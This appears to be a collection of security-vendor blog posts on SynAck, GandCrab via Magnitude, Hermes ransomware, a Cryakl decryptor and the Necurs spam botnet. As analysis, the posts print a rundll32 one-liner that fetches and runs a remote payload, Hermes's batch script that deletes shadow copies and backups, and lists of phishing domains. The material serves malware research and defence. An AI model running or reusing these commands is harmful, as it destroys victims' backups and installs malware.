SynAck ransomware: The doppelgängster

Malware tends to evolve, with crooks adding new functions and techniques to help it avoid detection by antivirus programs. Sometimes, the evolution is rather rapid. For example, SynAck ransomware, which has been known since September 2017 (when it was just average, not particularly clever), has recently been overhauled to become a very sophisticated threat that avoids detection with unprecedented effectiveness and uses a new technique called Process Doppelgänging.

 

Sneak attack

Malware creators commonly use obfuscation — attempts to make the code unreadable so that antiviruses will not recognize the malware — typically employing special packaging software for that purpose. However, antivirus developers caught on, and now antivirus software effortlessly unpacks such packages. The developers behind SynAck chose another way that requires more effort on both sides: thoroughly obfuscating the code before compiling it, making detection significantly harder for security solutions.

That’s not the only evasion technique the new version of SynAck uses. It also employs a rather complicated Process Doppelgänging technique — and it is the first ransomware seen in the wild to do so. Process Doppelgänging was first presented at Black Hat 2017 by security researchers, after which it was picked up by malefactors and used in several malware species.

Process Doppelgänging relies on some features of the NTFS file system and a legacy Windows process loader that exists in all Windows versions since Windows XP, letting developers create fileless malware that can pass off malicious actions as harmless, legitimate processes. The technique is complicated; to read more about it, see Securelist’s more detailed post on the topic.

SynAck has two more noteworthy features. First, it checks if it’s installed in the right directory. If it’s not, it doesn’t run — that’s an attempt to avoid detection by the automatic sandboxes various security solutions use. Second, SynAck checks if it’s installed on a computer with a keyboard set to a certain script — in this case, Cyrillic — in which case it also does nothing. That’s a common technique for restricting malware to specific regions.

 

The usual crime

From the user’s perspective, SynAck is just more ransomware, notable mainly for its steep demand: $3,000. Before encrypting a user’s files, SynAck ensures it has access to its important file targets by killing some processes that would otherwise keep the files in use and off limits.

The victim sees the ransom note, including contact instructions, on the logon screen. Unfortunately, SynAck uses a strong encryption algorithm, and no flaws have been found in its implementation, so there is no way yet to decrypt the encrypted files.

We have seen SynAck distributed mostly by Remote Desktop Protocol brute force, which means it’s mostly targeted at business users. The limited number of attacks thus far — all of them in the USA, Kuwait, and Iran — bears out this hypothesis.

 

Getting ready for the next generation of ransomware

Even if SynAck is not coming for you, its existence is a clear sign that ransomware is evolving, becoming more and more sophisticated and harder to protect against. Decryptor utilities will appear less frequently as attackers learn to avoid the mistakes that made the creation of those decryptors possible. And despite ceding ground to hidden miners (just as we predicted), ransomware is still a big global trend, and knowing how to protect against all such threats is a must for every Internet user.

Go to Source
Author: Alex Perekalin

Magnitude exploit kit switches to GandCrab ransomware

The GandCrab ransomware is reaching far and wide via malspam, social engineering schemes, and exploit kit campaigns. On April 16, we discovered that Magnitude EK, which had been loyal to its own Magniber ransomware, was now being leveraged to push out GandCrab, too.

While Magnitude EK remains focused on targeting South Koreans, we were able to infect an English version of Windows by replaying a previously recorded infection capture. This is an interesting departure from Magniber, which was extremely thorough at avoiding other geolocations.

Magnitude is now also using a fileless technique to load the ransomware payload, making it somewhat harder to intercept and detect. The variations of this technique have been known for several years and used by other families such as by Poweliks, but they are a new addition to Magnitude.

Figure 1: Magnitude EK traffic capture with the GandCrab payload

Magnitude has always experimented with unconventional ways to load its malware, for example via binary padding, or more recently via another technique, but still exposing it “in the clear” from traffic or network packet capture.

Figure 2: Magnitude EK dropping Magniber on April 4, 2018

The payload is encoded (using VBScript.Encode/JScript.Encode) and embedded in a scriplet that is later decoded in memory and executed.

"C:WindowsSystem32rundll32.exe" javascript:"..mshtml,RunHTMLApplication ";
document.write();GetObject('script:http://dx30z30a4t11l7be.lieslow[.]faith/5aad4b91a0da20d4faab0991bdbe7138')

Figure 3: Innocuous scriptlet hides the payload

After the payload is injected into explorer.exe, it immediately attempts to reboot the machine. If we suspend that process and use @hasherezade‘s PE-Sieve, we can actually dump the GandCrab DLL from memory:

Figure 4: Extracting the payload from memory using PE-Sieve

Upon successful infection, files will be encrypted with the .CRAB extension while a ransom note is left with instructions on the next steps required to recover those files.

Figure 5: GandCrab’s ransom note

A recent law enforcement operation provided victims with a way to recover their files from previous GandCrab infections. However, the latest version cannot be decrypted at the moment.

Malwarebytes users are protected against this attack when either the Internet Explorer (CVE-2016-0189) or Flash Player (CVE-2018-4878) exploits are fired.

Time will tell if Magnitude sticks to GandCrab, but this is a noteworthy change for an exploit kit that solely used its own Magniber ransomware for about 7 months, after having replaced the trusted Cerber.

Indicators of compromise

Dumped GandCrab DLL

9daf74238f0f7d0e64f8bb046c136d7e61346b4c084a0c46e174a2b76f30b57a

The post Magnitude exploit kit switches to GandCrab ransomware appeared first on Malwarebytes Labs.

Go to Source
Author: Jérôme Segura

Hermes ransomware distributed to South Koreans via recent Flash zero-day

This blog post was authored by @hasherezade, Jérôme Segura and Vasilios Hioureas.

At the end of January, the South Korean Emergency Response Team (KrCERT) published news of a Flash Player zero-day used in targeted attacks. The flaw, which exists in Flash Player 28.0.0.137 and below, was distributed via malicious Office documents containing the embedded Flash exploit. Only a couple of weeks after the public announcement, spam campaigns were already beginning to pump out malicious Word documents containing the newly available exploit.

While spam has been an active distribution channel for some time now, the news of a Flash exploit would most certainly interest exploit kit authors as well. Indeed, in our previous blog post about this vulnerability (CVE-2018-4878), we showed how trivial it was to use an already available Proof-of-Concept and package it as as a drive-by download instead.

On March 9th, MDNC discovered that a less common, but more sophisticated exploit kit called GreenFlash Sundown had started to use this recent Flash zero-day to distribute the Hermes ransomware. This payload was formerly used as part of an attack on a Taiwanese bank and suspected to be the work of a North Korean hacking group. According to some reports, it may be a decoy attack and “pseudo-ransomware“.

By checking on the indicators published by MDNC, we were able to identify this campaign within our telemetry and noticed that all exploit attempts were made against South Korean users. Based on our records, the first hit happened on February 27, 2018, (01:54 UTC) via a compromised Korean website.

We replayed this attack in our lab and spent a fair amount of time looking for redirection code within the JavaScript libraries part of the self hosted OpenX server. Instead, we found that it was hiding in the main page’s source code.

We had already pinpointed where the redirection was happening by checking the DOM on the live page, but we also confirmed it by decoding the large malicious blurb that went through Base64 and RC4 encoding (we would like to thank David Ledbetter for that).

Hermes ransomware

The payload from this attack is Hermes ransomware, version 2.1.

Behavioral analysis

The ransomware copies itself into %TEMP% under the name svchosta.exe and redeploys itself from that location. The initial sample is then deleted.

The ransomware is not particularly stealthy—some windows pop up during its run. For example, we are asked to run a batch script with administrator privileges:

The authors didn’t bother to deploy any UAC bypass technique, relying only on social engineering for this. The pop-up is deployed in a loop, and by this way it tries to force the user into accepting it. But even if we don’t let the batch script be deployed, the main executable proceeds with encryption.

The batch script is responsible for removing the shadow copies and other possible backups:

It is dropped inside C:UsersPublic along with some other files:

The file “PUBLIC” contains a blob with RSA public key. It is worth noting that this key is unique on each run, so, the RSA key pair is generated per victim. Example:

Another file is an encrypted block of data named UNIQUE_ID_DO_NOT_REMOVE. It is a blob containing an encrypted private RSA key, unique for the victim:

Analyzing the blob header, we find the following information:

The rest of the data is encrypted—at this moment, we can guess that it is encrypted by the RSA public key of the attackers.

The same folder also contains a ransom note. When the encryption finished, the ransom note pops up. The note is in HTML format, named DECRYPT_INFORMATION.html.

The interesting fact is that, depending on the campaign, in some of the samples the authors used BitMessage to communicate with victims:

This method was used in the past by a few other authors, for example in Chimera ransomware, and by the author of original Petya in his affiliate programs.

Encrypted files don’t have their names changed. Each file is encrypted with a new key—the same plaintext produces various ciphertext. The entropy of the encrypted file is high, and no patterns are visible. That suggests that some stream cipher or a cipher with chained blocks was used. (The most commonly used in such cases is AES in CBC mode, but we can be sure only after analyzing the code). Below, you can see a visualization of a BMP file before and after being encrypted by Hermes:

 

Inside each file, after the encrypted content, there is a “HERMES” marker, followed by another blob:

This time the blob contains an exported session key (0x01 : SIMPLEBLOB) and the algorithm identifier is AES (0x6611: CALG_AES). We can make an educated guess that it is the AES key for the file, encrypted by the victim’s RSA key (from the generated pair).

The ransomware achieves persistence by dropping a batch script in the Startup folder:

The script is simple; its role is just to deploy the dropped ransomware: svchosta.exe.

So, on each system startup it will make a check for new, unencrypted files and try to encrypt them. That’s why, as soon as one discovers that they have been attacked by this ransomware, they should remove the persistence entry in order to not let the attack repeat itself.

Inside the ransomware

Execution flow

At the beginning of the execution, the ransomware creates a mutex named “tech”:

The sample is mildly obfuscated, for example, its imports are loaded at runtime. The .data section of the PE file is also decrypted during the execution, so, at first we will not see the typical strings.

First, the executable begins to dynamically load all its imports via a function at 4023e0:

It then checks the registry key for a language code. If Russian, Belarusian, or Ukrainian are found as the system language, it exits the process (0x419 being Russian, 422 Ukrainian, and 423 Belarusian).

It then creates two subprocesses – cmd.exe. One that copies itself into directory appdata/local/temp/svchost.exe, and another that executes the copied file.

It also generates crypto keys using standard CryoptAquireCOntext libraries, and saves the public key and some kind of ID into the following files:

C:UsersPublicUNIQUE_ID_DO_NOT_REMOVE

C:UsersPublicPUBLIC

As mentioned earlier, it writes out a script to auto run on startup with contents: start “” %TEMP%svchosta.exe into the Start menu startup folder. This is quite simple and conspicuous. Since it is always running and keeps persistence, it makes sense that it saved out the public key into a file so that it can later find that key and continue encrypting using a consistent key throughout all executions.

Below is the function that calls all of this functionality sequentially, labeled:

It proceeds to cycle all available drives. If it is CDRom, it will skip it. Inside the function, it goes through all files and folders on the drive, but skips a few key directories, not limited to Windows, Mozilla, and the recycling bin.

Inside of the function labeled recursiveSearch_Encrypt are the checks for key folders and drive type:

It then continues on to enumerate netResources and encrypts those files as well. After encryption, it creates another bat file called window.bat to delete shadow volume and backup files. Here is its content:

vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
vssadmin Delete Shadows /all /quiet
del /s /f /q c:*.VHD c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:backup*.* c:*.set c:*.win c:*.dsk
del /s /f /q d:*.VHD d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:backup*.* d:*.set d:*.win d:*.dsk
del /s /f /q e:*.VHD e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:backup*.* e:*.set e:*.win e:*.dsk
del /s /f /q f:*.VHD f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:backup*.* f:*.set f:*.win f:*.dsk
del /s /f /q g:*.VHD g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:backup*.* g:*.set g:*.win g:*.dsk
del /s /f /q h:*.VHD h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:backup*.* h:*.set h:*.win h:*.dsk
del %0

It then creates and executes another bat file called svchostaaexe.bat that cycles through the entire file system again to search for and delete all backup files. This is interesting, as we have rarely seen ransomware looking in so much detail for backup files.

There is no functionality that communicates a decryption key to a C2 server. This means that the file UNIQUE_ID_DO_NOT_REMOVE, which contains the unique ID you have to send to the email address, must be encrypted by a public key pair that the attackers have pre-generated and retained on their side.

We have found that there is a heavy code reuse from the old versions of Hermes with this one. The flow of the code looks to be a bit different, but the overall functionality is the same. This is quite clear when comparing the two versions in a disassembler.

Below are two screenshots: the first from the current version we are analyzing, and the second from the old version. You can clearly see that even though the flow and arrangement are a bit different, the functionality remains mostly the same.

The new version:

And the old version 237eee069c1df7b69cee2cc63dee24e6:

Attacked targets

The ransomware attacks the following extensions:

tif php 1cd 7z cd 1cd dbf ai arw txt doc docm docx zip rar xlsx xls xlsb xlsm jpg jpe jpeg bmp db eql sql adp mdf frm mdb odb odm odp ods dbc frx db2 dbs pds pdt pdf dt cf cfu mxl epf kdbx erf vrp grs geo st pff mft efd 3dm 3ds rib ma max lwo lws m3d mb obj x x3d c4d fbx dgn dwg 4db 4dl 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr bak cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx ddl df1 dmo dnc dp1 dqy dsk dsn dta dtsx dxl eco ecx edb emd fcd fic fid fil fm5 fol fp3 fp4 fp5 fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt mrg mud mwb s3m myd ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb zdc cdr cdr3 ppt pptx abw act aim ans apt asc ase aty awp awt aww bad bbs bdp bdr bean bna boc btd cnm crwl cyi dca dgs diz dne docz dot dotm dotx dsv dvi dx eio eit emlx epp err etf etx euc faq fb2 fbl fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hwp hz idx iil ipf jis joe jp1 jrtf kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man map mbox me mell min mnt msg mwp nfo njx now nzb ocr odo odt ofl oft ort ott p7s pfs pfx pjt prt psw pu pvj pvm pwi pwr qdl rad rft ris rng rpt rst rt rtd rtf rtx run rzk rzn saf sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa stw sty sub sxg sxw tab tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof uot upd utf8 utxt vct vnt vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wpl wps wpt wpw wri wsc wsd wsh wtx xdl xlf xps xwp xy3 xyp xyw ybk yml zabw zw abm afx agif agp aic albm apd apm apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 cal cals can cd5 cdc cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv djvu dm3 dmi vue dpx wire drz dt2 dtw dvl ecw eip exr fal fax fpos fpx g3 gcdp gfb gfie ggr gif gih gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx itc2 iwi j j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jwl jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs myl ncr nct nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cgm cmx cnv csy cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg gem glox hpg hpgl hpl idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx mmat mat otg ovp ovr pcs pfv pl plt vrml pobj psid rdl scv sk1 sk2 ssk stn svf svgz sxd tlc tne ufr vbr vec vml vsd vsdm vsdx vstm stm vstx wpg vsm xar yal orf ota oti ozb ozj ozt pal pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli rpf rri rs rsb rsr rw2 rwl s2mv sci sep sfc sfw skm sld sob spa spe sph spj spp sr2 srw ste sumo sva save ssfn t2b tb0 tbn tfc tg4 thm tjp tm2 tn tpi ufo uga vda vff vpe vst wb1 wbc wbd wbm wbmp wbz wdp webp wpb wpe wvl x3f y ysp zif cdr4 cdr6 cdrw ddoc css pptm raw cpt pcx pdn png psd tga tiff tif xpm ps sai wmf ani flc fb3 fli mng smil svg mobi swf html csv xhtm dat

Encryption

Hermes, like many other ransomware, uses AES along with RSA for the encryption. AES is used to encrypt files with a random key. RSA is used to protect the random AES key.

The ransomware uses two RSA key pairs, one being a RSA hardcoded public key for the attackers.

Then, there is a keypair for the victim. It is generated at the beginning of the attack. The private key from this key pair is encrypted by the attackers’ public key and stored in the file UNIQUE_ID_DO_NOT_REMOVE.

When the victim sends this file, the attackers can recover the victim’s private key with the help of their own private key. The victim’s public key is stored in PUBLIC in clear text. It is later used to encrypt random AES keys, generated per file.

Cryptography is implemented with the help of Windows Crypto API. Function calls are mildly obfuscated, and pointers to the functions are manually loaded.

Each file processing starts from checking if it was already encrypted. The ransomware uses the saved marker “HERMES” that we already saw during the behavioral analysis. The marker is stored at the end of the file, before the block where the AES key is saved. Its offset is 274 bytes from the end. So, first the file pointer is set at this position to make a check of the characters.

If the marker was found, the file is skipped. Otherwise, it is processed further. As we noticed during the behavioral analysis, each file is encrypted with a new key. Looking at the code, we can find the responsible function. Unfortunately for the victims, the authors used the secure function CryptGenKey:

The used identifier for the algorithm is 0x6610 (CALG_AES_256). That means 256-bit is using AES encryption. This key is used to encrypt the content of the file. The file is read and encrypted in chunks, with 1,000,000 bytes each.

At the end, the marker “HERMES” is written and the exported AES key is saved:

The handle to the attacker’s RSA public key is passed, so the function CryptExportKey automatically takes care of protecting the AES key. Only the owner of the RSA private key will be able to import it back.

Protection

Malwarebytes users are  protected against this Flash Player exploit. In addition, the ransomware payload was blocked at zero-hour strictly based on its malicious behaviour.

Conclusion

Another campaign that we know of targeting South Koreans specifically is carried by malvertising and uses the Magnitude exploit kit, which also delivers ransomware—namely Magniber. That particular infection chain goes to great lengths to only infect this particular demographic, via geo-aware traffic redirection and language checks within the malware code itself.

After analyzing the sample, we found it to be a fully functional ransomware. However, we cannot be sure what the real motivations of the distributors were. Looking at the full context, we may suspect that it was politically motivated rather than a profit-driven attack.

Although the infection vector appeared to narrow down to South Korea, the malware itself, unlike Magniber, does not specifically target these users. The fact that the ransomware excludes certain countries like Russia or Ukraine could tie the development and outsourcing of the malware to these areas or be a false flag. As we know, attribution is always a complex topic.

Indicators of compromise

Domains involved in campaign:

  • 2018-02-27 (01:54 UTC)
    • staradvertsment[.]com
    • hunting.bannerexposure[.]info
  • 2018-02-28
    • staradvertsment[.]com
    • accompanied.bannerexposure[.]info
  • 2018-03-01
    • switzerland.innovativebanner[.]info
  • 2018-03-07
    • name.secondadvertisements[.]com
  • 2018-03-08
    • assessed.secondadvertisements[.]com
    • marketing.roadadvertisements[.]com
  • 2018-03-09
    • bannerssale[.]com
    • aquaadvertisement[.]com
    • technologies.roadadvertisements[.]com

IP addresses:

  • 159.65.131[.]94
  • 159.65.131[.]94
  • 207.148.104[.]5

Hermes 2.1 ransomware:

  • A5A0964B1308FDB0AEB8BD5B2A0F306C99997C7C076D66EB3EBCDD68405B1DA2
  • pretty040782@gmail[.]com
  • pretty040782@keemail[.]me

The post Hermes ransomware distributed to South Koreans via recent Flash zero-day appeared first on Malwarebytes Labs.

Go to Source
Author: Malwarebytes Labs

Cryakl/Fantomas victims rescued by new decryptor

The No More Ransom project for assisting victims of ransomware has good news to report: The Belgian police, in cooperation with Kaspersky Lab, managed to obtain keys for recovering files encrypted with new versions of Cryakl ransomware, also known as Fantomas. The updated decryption tool is already available on the project’s website.

How to decrypt files encrypted by the Shade ransomware

What is Cryakl?

The Trojan ransomware Cryakl (Trojan-Ransom.Win32.Cryakl) has been . At first, it was distributed through attached archives in e-mails that appeared to come from an arbitration court in connection with some alleged wrongdoing. There is something about such messages that sets nerves to jangling, and even those who know better might be inclined to click on the attachment. Later, the e-mails diversified, looking like messages from other organizations, such as a local homeowners’ association.

When encrypting files on a victim’s computer, Cryakl creates a long key that it sends to a command-and-control C&C server. Without this key, it is nearly impossible to recover files impacted by the malware. After that, Cryakl replaces the desktop wallpaper with contact details for its creators together with a ransom demand. Cryakl also displays an image of the mask of the 1964 French movie villain Fantomas, hence its alternative name. Cryakl mostly targeted users in Russia, so information about it is mostly available in Russian.

Ransomware’s history and evolution in facts and figures

Success story

As we already said, the joint efforts of our experts and Belgian police resulted in obtaining the master keys. The investigation began when the computer crime unit learned about victims of the ransomware in Belgium, and then they discovered a C&C server in a neighboring country. An operation led by the Belgian federal prosecutor neutralized the server, along with several other C&C servers that received master keys from infected machines. Then Kaspersky Lab stepped in to assist the law enforcement agencies, not for the first time. As before, the results were first-class: Our experts helped analyze the data found and extract the decryption keys.

The keys have already been added to the RakhniDecryptor tool on the No More Ransom website, and the Belgian federal police is now an official partner of the project. No More Ransom, which has been running since July 2016, has to date provided free help to tens of thousands of people in decrypting files rendered unusable by ransomware, and deprived cyberblackmailers of at least 10 million euros of potential booty.

No More Ransom: A very productive year

How to rescue files encrypted by Cryakl ransomware

The No More Ransom site offers two tools for decrypting files corrupted by Cryakl. One, named RannohDecryptor and around since 2016, is for older versions of Cryakl. You can download it at NoMoreRansom.org, and get decryption instructions here.

We recently updated the second tool, RakhniDecryptor, by adding the master keys from the servers seized by the Belgian police. It can be downloaded from the same site; instructions are available here. RakhniDecryptor is needed to decrypt files hit by newer versions of Cryakl. Either one of the tools should restore Cryakl-infected files to full health.

How to stay safe in the future

When dealing with cryptoransomware, prevention is far cheaper and simpler than a cure. In other words, it’s better to secure yourself now and sleep easy than to mess around with file decryption. We’d like to share a few preemptive file protection tips:

1. Always keep a copy of your most important files somewhere else: in the cloud, on another drive, on a memory stick, or on another computer. More details about backup options are available here.

2. Use reliable AV software. Some security solutions — for example, Kaspersky Total Security — can also assist with file backup.

3. Don’t download programs from suspicious sources. Their installers might contain something you’d rather not have on your computer.

4. Don’t open attachments in e-mails from unknown senders, even if they look important and credible. If in doubt, look up the phone number on the organization’s official website and call to check.

Go to Source
Author: Anna Markovskaya

The Many Tentacles of the Necurs Botnet

Introduction

Over the past five years the Necurs botnet has established itself as the largest purveyor of spam worldwide. Necurs is responsible for emailing massive amounts of banking malware, ransomware, dating spam, pump-n-dump stock scams, work from home schemes, and even cryptocurrency wallet credential phishing. Necurs sends so much spam that at times Necurs’ spam campaigns can make up more than 90% of the spam seen by Cisco Talos in one day.

To conduct a deeper analysis of Necurs, Talos extracted 32 distinct spam campaigns sent by Necurs between August 2017 and November 2017. The result was a collection of over 2.1 million spam messages, sent from almost 1.2 million distinct sending IP addresses in over 200 countries and territories.

Necurs Recipients

From an email marketing and delivery perspective, Necurs doesn’t appear to be too sophisticated. Necurs’ recipient database includes email addresses that have been harvested online, commonly deployed role-based accounts, as well as email addresses that appear to have been auto-generated. These are among the worst, most unreliable sources for obtaining email addresses, and any legitimate email marketer wouldn’t last a day mailing to addresses such as these. Of course, an illegitimate botnet such as Necurs has no such concerns. For many months the email addresses in Necurs database seemed to be largely static; Necurs hasn’t actively added any new addresses for at least the past year, possibly two years or more. In November of 2017, Necurs stopped mailing to many of the autogenerated accounts.

At one of my personal domains, Necurs has been seen mailing to addresses such as ‘equifax@’ –an email address that was originally stolen from Equifax years before the 2017 breach. Necurs also often mails to ‘thisisatestmessageatall@’, another email address I generated and put into the wild, long ago. There are also variations on other legitimate addresses, for example ‘aeson@’, ’20jaeson@’, and ‘eson@’ which are all variations on my address ‘jaeson@’. The number 20 was present at the beginning of many of Necurs recipients. Hex 20 corresponds with the space character and is used in percent-encoding, etc. This provides further indication of the harvested nature of these addresses.

Other addresses in Necurs’ mailing list appear to have been auto-generated. For example ‘EFgUYsxebG@’, ‘ZhyWaTmu@’, and ‘MTAyOvoYkx@’ have never been aliases at my domain that I’ve ever used, and the only mail these accounts ever receive comes from Necurs.

Necurs email received at an auto-generated email address

From our set of Necurs’ spam messages, Talos extracted only the user alias portion of the To: address. There are numerous email aliases, such as role-based addresses, that appear to be in Necurs’ recipient DB across many different recipient domains. Strangely, the list also included some odd email aliases deployed at multiple domains such as ‘unity_unity[0-9]@’, ‘petgord32truew@’, ‘iamjustsendingthisleter@’, ‘docs[0-9]@’, and others.

Email alias and the number of domains in our data in which that alias was found

Interestingly, some of these same strange aliases can be found on Project Honeypot’s list of the Top Dictionary Attacker Usernames, though it is unclear whether Necurs obtained their aliases from this list, or whether these aliases made Project Honeypot’s list as a result of Necurs’ spamming activity.

Project Honeypot’s Top Dictionary Attacker Usernames

Necurs Sending IPs

Next, Talos extracted the sending IP addresses responsible for transmitting Necurs’ spam emails, and we grouped the data according to geographical location. Rather than being uniformly distributed worldwide, a majority of Necurs’ nodes were concentrated among just a few countries –India (25.7% of total spam), Vietnam (20.3% of total spam), and Iran (7.3% of total spam). More than half (51.3%) of the sending IP addresses in our data came from just these three countries. In contrast, other large industrialized nations were only responsible for tiny fraction of the spam. For example, the United States, was home to 6,314 (less than 1%) of Necurs sending IPs. The country of Russia was only attributed to 38 sending IP addresses out of a nearly 1.2 million total sender IPs!

Number of spam messages sent per country

Talos also analyzed the individual spam campaigns in order to determine how often the sending IP addresses were reused from campaign to campaign. We found very little infrastructure reuse. In fact, none of the sending IP addresses in our data were seen across all thirty-two of the campaigns we extracted. Only three sending IP addresses could be found across thirty of Necurs’ spam campaigns. The vast, vast majority of sending IP addresses, 937,761 (78.6% of the total), were only ever seen in a single Necurs spam campaign! This means that Necurs botnet is large enough to conduct attacks over several months without substantial reuse of most sending nodes –an impressive feat.

Number of unique IP addresses vs. how many campaigns in which they appeared

Necurs Spam Campaigns

Typically email campaigns from Necurs fall into one of two categories: high-volume weekday campaigns, or low volume continuous campaigns. Necurs has occasionally been seen sending high volume campaigns on weekends, but the vast majority of the time high volume campaigns are limited to the business week only. The mailing list database Necurs is using seems to be segmented, such that the high volume campaigns use one subset of email addresses from the DB, and the low volume campaigns use a different set of email addresses.

PUMP-N-DUMP STOCK SPAM

Below is an example of a pump-n-dump stock spam sent on April 12th, 2017 by Necurs touting the stock symbol QSMG, Quest Management Incorporated. On the following day the price of QSMG peaked at $2.33, probably netting the criminals a tidy gain on their initial investment. QSMG is currently worth less than $0.02.

A message touting the penny stock, QSMG
QSMG was at $2.33 on April 13. Currently it is worth less than $0.02

DATING SPAM

Necurs also sends dating spam. Recent dating spam have arrived without any URLs in the body, except a mailto: link to an email address. Current dating campaigns have involved the free email provider rambler.ru, but other previous dating campaigns have taken advantage of similar free email services such as gmx.com. Necurs’ dating campaigns have also been known to include HTML links to fast-fluxed domains, or sometimes compromised websites (WordPress, etc.).

Necurs dating spam featuring an email address at rambler.ru

If you respond to one of these dating messages, you may be enrolled in a Russian dating website such as marmeladies.site. In this case, the criminals are making money by referring new users to these dating sites. Most likely they are being paid on an affiliate model.

Marmeladies is one of the dating sites to which victims who reply are directed

RANSOMWARE

Of course one of Necurs’ most well-known payloads is ransomware. Necurs has been one of the biggest distributors of the Locky ransomware. Locky also works on an affiliate model. Inside of each locky sample, in the metadata, is an affiliate ID, which is always the same (3) for Necurs mailings. Most of the time, very little investment is made in the design of the messages themselves, as in the following example.

A typical ransomware campaign from Necurs

CRYPTOCURRENCY CREDENTIAL PHISHING

The rise (and fall) in the value of digital currencies such as Bitcoin and Etherium has not escaped the attention of the Necurs criminals. They have been seen conducting attack campaigns using domains designed to look similar to legitimate wallet management websites. In the email below, note the extra word ‘my’ in the domain ‘mymyetherwallet.com’.

This domain is registered to appear similar to the real Etherium wallet management site, myetherwallet.com

Recently, the Necurs attackers have drawn from previous stock pump-n-dump scams to come up with a relatively new tactic related to cryptocurrency. They had a spam campaign pumping Swisscoin (SIC).

A Necurs spam email encouraging recipients to buy Swisscoin (SIC)

JOB SPAM

Necurs was recently sending a low volume job spam campaign which includes links to freshly registered domains. For example, in the email below, sent October 30th 2017, we can see they are using a link to the domain, ‘supercoins.top’. (The affiliate id in the URL is always the same)

An example of a low volume, job-related spam campaign from Necurs

Attribution

WHOIS-AGENT@GMX.COM

Checking the whois record for this domains we see the following registration details. Note the registrant email ‘whois-agent@gmx.com’. This is an attempt by the threat actors to convince the casual observer that the domain is somehow registered through a third party whois privacy protection service. Email accounts @gmx.com are free to the public, and in this instance the attackers have simply generated the alias ‘whois-agent’ for their use in registering domains.

A review of the domains registered to ‘whois-agent@gmx.com’ yields 399 domains (from DT as of January 17, 2018). The list of domains registered to ‘whois-agent@gmx.com’ reads like a who’s-who of criminal activity.

Among some of the more notable domains we can see obvious phishing domains:

amex-notification.com
amexcardmail.com
amexmailnotification.com
natwestonlinebanking.info
hsbc-sec.site
dropbox-ch.co
dropbox-fileshare.com
dropboxmailgate.com
paypa1.info
sage-uk.com
sagepay.info

Typo-squattish domains targeting cryptocoin-related sites:

myetlherwa11et.com
myetlherwalllet.com
rnyetherwa11et.com
blockchaifn.info
blockchaign.info
blockchainel.info
blockchaingr.info
blockchait.info
blockchalgn.info
blockchalne.info
blockchalner.info
blockchalng.info
blockchanel.info
blockchart.info
blockchatn.info
blockcheing.info
blockcheit.info
blockclmain.info
blockclnajn.info
bloclnchain.info
bloknchain.info

Fake Flash Player Update domains:

flash-ide-update.top
flash-ime-update.top
flash-one-eupdate.top
flash-one-update.info
flash-player-update.info
flash-update-player.info

Even domains intended to masquerade as government resources:

asic-gov-au.co
australia-gov-au.com
canadapost-office.info
govonfraud.info

A review of some of the domains in passive DNS gives us some other important clues. While most domains are only registered for the minimum of one year, the attackers have chosen to maintain the registration for a longer time on other domains such as ‘pp24.ws’. That domain is home to an online marketplace for buying and selling stolen credit card numbers, stolen ssh account credentials and more.

‘pp24.ws’ is a website dedicated to buying and selling stolen credit card numbers

